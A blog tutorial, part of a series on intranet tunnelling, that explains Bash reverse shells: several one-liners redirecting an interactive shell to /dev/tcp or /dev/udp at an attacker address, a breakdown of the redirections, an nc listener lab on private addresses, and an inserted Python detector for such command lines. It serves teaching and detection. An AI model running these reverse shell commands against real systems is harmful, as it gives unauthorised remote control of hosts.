Intranet tunnel proxy technology (7): Bash reverse shell

Bash reverse shell

Introduction to Bash

The shell, also known as the terminal, is the translator between people and the kernel, and Bash is the default shell used in Linux.

Bash reverse shell commands are as follows:

bash -i >&/dev/tcp/<attacker_IP>/<attacker_port> 0>&1
bash -i >&/dev/tcp/<attacker_IP>/<attacker_port> 0>&2
bash -i >&/dev/udp/<attacker_IP>/<attacker_port> 0>&1
bash -i >&/dev/udp/<attacker_IP>/<attacker_port> 0>&2

Next, we break these commands down step by step and explain each part in detail.

"bash -i" opens an interactive shell.

The "&" symbol is used to distinguish between files and file descriptors. When ">&" is followed by a file, standard output and standard error are both redirected to that file. When ">&" is followed by a number, the number is a file descriptor; without the "&" symbol, the number would be treated as a file. The numbers "0", "1", and "2" are file descriptors in the Linux shell: "0" refers to standard input, "1" refers to standard output, and "2" refers to standard error.

"tcp" and "udp" in the "/dev" directory are special devices in Linux that can be used to establish a socket connection. Reading and writing these two files is equivalent to transmitting data over a socket connection. ">&/dev/tcp/<attacker_IP>/<attacker_port>" redirects standard output and standard error to the "/dev/tcp/<attacker_IP>/<attacker_port>" file, that is, to the attacking machine, so the results of commands executed on the target machine can be seen from the attacking machine. "0>&1" or "0>&2" redirects standard input to standard output (or standard error). Because that output is already redirected to the attacking machine, standard input is redirected to the attacking machine as well, so commands can be entered from the attacking machine and their output seen there.
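From the defender's side, the redirection structure described above is also what makes these commands recognizable in process command-line logs. The following is an added example, not code from the original post: the function name `analyze`, the severity labels, and the sample lines (including the 10.0.0.5 address) are constructed for illustration.

```python
import re

# A redirection whose target is Bash's /dev/tcp or /dev/udp pseudo-path.
NET_REDIRECT = re.compile(
    r"(?P<fd>\d*)(?P<op>>&|&>|<>|>|<)\s*"
    r"/dev/(?P<proto>tcp|udp)/(?P<host>[^/\s]+)/(?P<port>\d+)"
)
# Standard input duplicated onto stdout or stderr, e.g. 0>&1 or 0>&2.
STDIN_DUP = re.compile(r"(?<![\w/])0[<>]&[12]\b")
# An interactive shell flag such as "bash -i".
INTERACTIVE = re.compile(r"\b(?:ba)?sh\s+(?:-\w+\s+)*-\w*i\w*\b")


def analyze(cmdline):
    """Return a finding dict for a command line, or None if nothing matches."""
    net = NET_REDIRECT.search(cmdline)
    if net is None:
        return None
    stdin_dup = STDIN_DUP.search(cmdline) is not None
    return {
        "proto": net["proto"],
        "host": net["host"],
        "port": int(net["port"]),
        "interactive": INTERACTIVE.search(cmdline) is not None,
        # Output and input both attached to the socket is the full
        # pattern described above; a lone redirect may be a port probe.
        "severity": "high" if stdin_dup else "medium",
    }


# Constructed sample command lines, as they might appear in process audit logs.
SAMPLES = [
    "bash -i >&/dev/tcp/192.168.41.130/9999 0>&1",
    "bash -i >&/dev/udp/192.168.41.130/9999 0>&2",
    'bash -c "echo > /dev/tcp/10.0.0.5/443"',
    "ls -l /dev/tcp_wrappers > /tmp/out 2>&1",
    "tar czf backup.tgz /var/log",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(analyze(line), "<-", line)
```

The "medium" result is for review rather than alerting, since a single write to /dev/tcp is also a common connectivity check in administration scripts.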

Introduction to Experimental Environment

Experimental topology

Machine name      IP                OS
Attack machine    192.168.41.130    Windows
Server            192.168.41.132    Kali

Experimental reproduction

The attacking machine uses nc to run the listening command:

# Listen on TCP
nc64.exe -lvvp 9999
# Listen on UDP
nc64.exe -lup 9999

The experimental server executes the connection command:

bash -i >&/dev/tcp/192.168.41.130/9999 0>&1

Checking the result, we find that we successfully obtained the target server IP.

Origin blog.csdn.net/qq_64973687/article/details/131385453